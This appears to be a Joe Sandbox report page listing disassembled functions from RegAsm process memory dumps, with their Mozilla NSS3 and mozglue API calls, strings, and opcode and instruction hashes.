Opcode ID: 0c224a01dba1387fa2f0ca6418467146fb49270bf6d2bd1d4b1674245491114a
Instruction ID: ff277cd9f8281edad642462a5b0132a2844f22cd1128bf7123848f16c9e1c235
Opcode Fuzzy Hash: 0c224a01dba1387fa2f0ca6418467146fb49270bf6d2bd1d4b1674245491114a
Instruction Fuzzy Hash: 43F01CB1A002097FEB00AB54DD89DAB376DEB46629F044031FE0857741D635BE6986F7

Function 6C90AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6C8F5D40,00000000,?,?,6C8E6AC6,6C8F639C), ref: 6C90AC2D

Part of subcall function 6C8AADC0: TlsGetValue.KERNEL32(?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE10
Part of subcall function 6C8AADC0: EnterCriticalSection.KERNEL32(?,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE24
Part of subcall function 6C8AADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C88D079,00000000,00000001), ref: 6C8AAE5A
Part of subcall function 6C8AADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE6F
Part of subcall function 6C8AADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE7F
Part of subcall function 6C8AADC0: TlsGetValue.KERNEL32(?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAEB1
Part of subcall function 6C8AADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAEC9

PK11_FreeSymKey.NSS3(?,6C8F5D40,00000000,?,?,6C8E6AC6,6C8F639C), ref: 6C90AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C8F5D40,00000000,?,?,6C8E6AC6,6C8F639C), ref: 6C90AC59
free.MOZGLUE(8CB6FF01,6C8E6AC6,6C8F639C,?,?,?,?,?,?,?,?,?,6C8F5D40,00000000,?,6C8FAAD4), ref: 6C90AC62

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 2b76d8db2b5ceb3db712bf032370274ef73e9f09e8979803e52927a873c3a666
Instruction ID: 8769601636e41422fcd97398b6807df20e1032498a6d83a8ff4a874c96bc738d
Opcode Fuzzy Hash: 2b76d8db2b5ceb3db712bf032370274ef73e9f09e8979803e52927a873c3a666
Instruction Fuzzy Hash: CA018BB56002109FDB10CF28E9C0B8677ACAF14B5DF188468E9499FB06DB30E848CBA1

Function 6C792050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C79205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C79201B,?,?,?,?,?,?,?,6C791F8F,?,?), ref: 6C792064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79208E
free.MOZGLUE(?,?,?,00000000,?,6C79201B,?,?,?,?,?,?,?,6C791F8F,?,?), ref: 6C7920A3

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: b50e8e091b11e9c84071983ecb8c823afa30edc3810fa30aea55d7874a7568ae
Instruction ID: b8b18768606b5f9599dbd3fa56f6b99a68a07b431d0891e42641f4ffecb96856
Opcode Fuzzy Hash: b50e8e091b11e9c84071983ecb8c823afa30edc3810fa30aea55d7874a7568ae
Instruction Fuzzy Hash: 54F0B4751006009FC7119F16E88C75BB7FCEF86364F10012AF54687711DB72B905CB95

Function 6C78EB00 Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C78EA9B

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID:
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)
API String ID: 0-1136413219
Opcode ID: ea544f991380c9c8c0b1fb6d59efa9b3771ee227db79f5bd0ca8bbe63f9d369f
Instruction ID: 33e2578a5ec02628983f2e4dadb05417f987a7f15b6baeafb250b2f74e2a6905
Opcode Fuzzy Hash: ea544f991380c9c8c0b1fb6d59efa9b3771ee227db79f5bd0ca8bbe63f9d369f
Instruction Fuzzy Hash: E9F0E532301216AFDB405FA9DC09B957BB8EB82B5AF00403AFA15D3780C7786745C7A9

Function 6C7920B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C7920B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C77FBD1,?,?,?,6C7CF430,?,?,?,6C77FA2B,?,?,?,?,6C755407), ref: 6C7920C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C77FBD1,?,?,?,6C7CF430,?,?,?,6C77FA2B,?,?,?,?,6C755407), ref: 6C7920DA
free.MOZGLUE(00000000,?,6C77FBD1,?,?,?,6C7CF430,?,?,?,6C77FA2B,?,?,?,?,6C755407), ref: 6C7920F1

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 56a6c1af01e4c243f43cc510aea29a43a1f81f424fa6e994fba429bd04a15c95
Instruction ID: c96ebf4930ea487567ca5a7e9b39ec85654c17d5bc2f9b3f67ead0d6b4bd9276
Opcode Fuzzy Hash: 56a6c1af01e4c243f43cc510aea29a43a1f81f424fa6e994fba429bd04a15c95
Instruction Fuzzy Hash: 89E0E5316006159FC720AF29A80C54EB7FDEF86314B10023AF40683B00D775FA468AD5

Function 6C7985B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C7985D3

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C798725

Strings

map/set<T> too long, xrefs: 6C798720

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 395b1801a9c8a67e954a05367460949540f378eabee3d435d965fd81a986beee
Instruction ID: 1ac10404ac50e533c001f86a89516b5963be5eea07f2885ce505dd48e9fa7516
Opcode Fuzzy Hash: 395b1801a9c8a67e954a05367460949540f378eabee3d435d965fd81a986beee
Instruction Fuzzy Hash: EF5156B46046458FD701CF28D288B5ABBF1BF4A318F18C19AD8599FB52C375E885CF92

Function 6C74BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C74BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C74BE8F

Strings

0, xrefs: 6C74BE5B

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 0265d5c067fcece2cfaa0a9c195e68d96c2f56eecbb1924ff4d8117932b61fdf
Instruction ID: 1f63a3d0a928d81ff242905b0a0d039fd0b8550528cd589327ba341db5b6024a
Opcode Fuzzy Hash: 0265d5c067fcece2cfaa0a9c195e68d96c2f56eecbb1924ff4d8117932b61fdf
Instruction Fuzzy Hash: C8419E71909B45CFC711CF38C581A9FB7F8AF8A348F008A6DF995A7611D730E9498B82

Function 6C749A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C749B2C
memcpy.VCRUNTIME140(6C7499CF,00000000,?), ref: 6C749BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6C749BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6C749DE4

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8cac8b362643245bf0020c8f00e29f0a7ccc6a9eddc84bccac5b0e8c23543103
Instruction ID: e49451703ca88899a434433644b32a9f79df96e90879c935fbb93534a8bf4aa9
Opcode Fuzzy Hash: 8cac8b362643245bf0020c8f00e29f0a7ccc6a9eddc84bccac5b0e8c23543103
Instruction Fuzzy Hash: 57D17A71A0020A9FCB14CF69CA81AAEBBF6FF88314F18852DE945A7740D731ED45CB90

Function 6C790A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6C7537F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,00000000,?,?,6C790ABF,baseprofiler::profiler_capture_backtrace,00000000,6C79138F,00000039,00000000,?,6C79138F,?,?,?), ref: 6C75380A

Part of subcall function 6C788DC0: moz_xmalloc.MOZGLUE(00000038,?,?,?,?,6C790B01,?,6C79138F,?,?,?), ref: 6C788DCC

Part of subcall function 6C790B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6C79138F,?,?,?), ref: 6C790B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6C79138F,?,?,?), ref: 6C790B27
free.MOZGLUE(?,?,?,?,?,6C79138F,?,?,?), ref: 6C790B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6C790AB5

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: 2ef965adefdd0c4596094f668b41a7de37297a552ebb0b7e689656027ec14b27
Instruction ID: 58e4156d77d05e9d280d2fbb64a2a3440cfc750effcfcc1cf6bda442e5bc33c7
Opcode Fuzzy Hash: 2ef965adefdd0c4596094f668b41a7de37297a552ebb0b7e689656027ec14b27
Instruction Fuzzy Hash: 4921B575B002499FDB04DF54DA99BBEB3B9EF89708F10043DD8159BB41DB70AA44CBA1

Function 6C74F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6C74F19B

Part of subcall function 6C76D850: EnterCriticalSection.KERNEL32(?), ref: 6C76D904
Part of subcall function 6C76D850: LeaveCriticalSection.KERNEL32(?), ref: 6C76D971
Part of subcall function 6C76D850: memset.VCRUNTIME140(?,00000000,?), ref: 6C76D97B

mozalloc_abort.MOZGLUE(?), ref: 6C74F209

Strings

d, xrefs: 6C74F1F5

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: b2e6ebadaabd92da15ac04c92067c582d0f13bd22ca88d39cb0a7a5cab2c0ad5
Instruction ID: 8b8ece35757ef4f4a0175b685c50a78193b63441580aedb373ec8de8b1db7ba0
Opcode Fuzzy Hash: b2e6ebadaabd92da15ac04c92067c582d0f13bd22ca88d39cb0a7a5cab2c0ad5
Instruction Fuzzy Hash: C7115C32E01A4E8BEB048F58CA555FEB375DF56208B11D13DDC05ABB12EB309AC4C394

Function 6C75CA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6C75CA26

Part of subcall function 6C75CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C75CB49
Part of subcall function 6C75CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C75CBB6

mozalloc_abort.MOZGLUE(?), ref: 6C75CAA2

Strings

d, xrefs: 6C75CA6C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: d9a5499a68057889e5873847aff43bc981b4fab33979a9d983eb49aef7f28831
Instruction ID: a7780bce20954c71cfac4c9b665463b08dfc705c240d97bf9452bd1cdaac00f7
Opcode Fuzzy Hash: d9a5499a68057889e5873847aff43bc981b4fab33979a9d983eb49aef7f28831
Instruction Fuzzy Hash: F711E521E00A8C97DB01DB68C9555FDB774FF9A204B459239DC45AB613EB31A5D4C390

Function 6C783CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C783D19
mozalloc_abort.MOZGLUE(?), ref: 6C783D6C

Strings

d, xrefs: 6C783D58

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 39e729063480a936c587b073fd643718c04c64068c222a7d5d24cc9d3c58d492
Instruction ID: 7fcaff0fed85198c87cf353888a221dd8971649ff2e943226d2a0d444b46711c
Opcode Fuzzy Hash: 39e729063480a936c587b073fd643718c04c64068c222a7d5d24cc9d3c58d492
Instruction Fuzzy Hash: 32112731E04A89DBDB048F6DC91A8EDB775EF96318B449338DD459B602FB30A5C4C3A0

Function 6C761A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6C761A6B

Part of subcall function 6C761AF0: EnterCriticalSection.KERNEL32(?), ref: 6C761C36

mozalloc_abort.MOZGLUE(?), ref: 6C761AE7

Strings

d, xrefs: 6C761AB1

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: d90b4f17392fcf774ef993bc8a5e4d75429b82572c9451d7d55040f977237cdd
Instruction ID: eb88ed1d14ceb6285dfdb1b15b26271f787269d46f3aa398909944373c526c40
Opcode Fuzzy Hash: d90b4f17392fcf774ef993bc8a5e4d75429b82572c9451d7d55040f977237cdd
Instruction Fuzzy Hash: 90110632E0068C97DB048FA9C9194FEB775EF95304F449629DD45ABB12EB30E5C4C390

Function 6C754730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C7544B2,6C7CE21C,6C7CF7F8), ref: 6C75473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C75474A

Strings

GetNtLoaderAPI, xrefs: 6C754744

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: 34999b5761d78906ac08bc7c25973669b09390eb5f6f6a1612a0e123c7f6485a
Instruction ID: b4e32ad747c15d023abe38f0df5a7c3e09e53a4ba8ec91ddead15a31b25ff682
Opcode Fuzzy Hash: 34999b5761d78906ac08bc7c25973669b09390eb5f6f6a1612a0e123c7f6485a
Instruction Fuzzy Hash: 3F015E753016599FDF00AF76898461D7BF9FB8B311B044479EA05D7700DB74E9118F92

Function 6C7A20C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6C77FA80: GetCurrentThreadId.KERNEL32 ref: 6C77FA8D
Part of subcall function 6C77FA80: AcquireSRWLockExclusive.KERNEL32(6C7CF448,?,6C77FA1F,?,?,6C755407), ref: 6C77FA99

Part of subcall function 6C7A2140: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?), ref: 6C7A2243

ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,00000001,00000000,?,?,?,6C7A2633,?,?,?), ref: 6C7A211D

Strings

3&zl, xrefs: 6C7A20CB
3&zl, xrefs: 6C7A2123

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_
String ID: 3&zl$3&zl
API String ID: 1463952509-2185862138
Opcode ID: 0d52aa7c7d63c3a9e80a796dd301d2a3dc8f94173442fdc7ef4bf18761668eca
Instruction ID: a5c74e58f7c5025268cdc5a58bb43ebe228ba91e6bad794782f3e8b0c49ebebf
Opcode Fuzzy Hash: 0d52aa7c7d63c3a9e80a796dd301d2a3dc8f94173442fdc7ef4bf18761668eca
Instruction Fuzzy Hash: B30169B1A002199FCB00CF59C888BDABBB8FF49354F454069E905AB341D770A948CBA0

Function 6C7A6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C7A6E22
__Init_thread_footer.LIBCMT ref: 6C7A6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C7A6E1D

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: fa2a20c7444f4e1de79e2db28292d133fe0e3d73286f3efe966e183036092f4e
Instruction ID: 8348385f79bd6f23ea3782ef5d8b46225d41a5818734a61a8091d1d02cdb37a7
Opcode Fuzzy Hash: fa2a20c7444f4e1de79e2db28292d133fe0e3d73286f3efe966e183036092f4e
Instruction Fuzzy Hash: 24F0E975749242CFEF109BBCCB58A917775B713318F040275C81556B61D721B74BCAA3

Function 6C759E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C759EEF

Strings

NaN, xrefs: 6C759EC1
Infinity, xrefs: 6C759EB7

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: a4fd6e4d1b8499a7fed50f2ae25c41d6a10edfc1e87ac6a5021301f9c81a4086
Instruction ID: 3c581bb69d12e84ba3b60eebc67180744f7ee6594b8055e7c63c670d46e527e8
Opcode Fuzzy Hash: a4fd6e4d1b8499a7fed50f2ae25c41d6a10edfc1e87ac6a5021301f9c81a4086
Instruction Fuzzy Hash: 5DF0C2B1700A47CFDB00CF28DA6BB803371B31332AF204A38D5040AB40D735A79ACA92

Function 6C756C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kxl,?,6C784B30,80000000,?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C756C42

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

moz_xmalloc.MOZGLUE(0Kxl,?,6C784B30,80000000,?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C756C58

Strings

0Kxl, xrefs: 6C756C33, 6C756C41, 6C756C57

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
